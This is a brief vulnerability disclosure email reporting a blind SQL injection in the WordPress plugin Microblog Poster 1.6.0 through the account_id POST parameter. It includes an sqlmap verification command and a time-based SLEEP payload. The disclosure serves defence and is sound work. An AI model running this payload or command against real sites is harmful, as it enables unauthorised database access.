Subject: Blind SQL injection in Microblog Poster 1.6.0
Date: Wed, 22 Jul 2015 13:17:40 +0200

Hello,

Plugin: Microblog Poster 1.6.0 https://wordpress.org/plugins/microblog-poster/

Authenticated administrators can execute arbitrary SQL commands (there is no CSRF protection).

1. SQL injection (microblogposter_settings_output())

Method: POST
Url: http://localhost/wp-admin/options-general.php?page=microblogposter.php
Vulnerable parameter: account_id

Example PHP callstack:
microblogposter_settings_output   [/microblog-poster/microblogposter_options.php:543]
wpdb::get_results

Verification:

sqlmap --cookie "..." --dbms mysql --data "update_account_hidden=1&account_id=1" -u "http://localhost/wp-admin/options-general.php?page=microblogposter.php" -p account_id

...
Parameter: account_id (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: update_account_hidden=1&account_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))hUuS)
...


--
Regards,
Marcin Probola,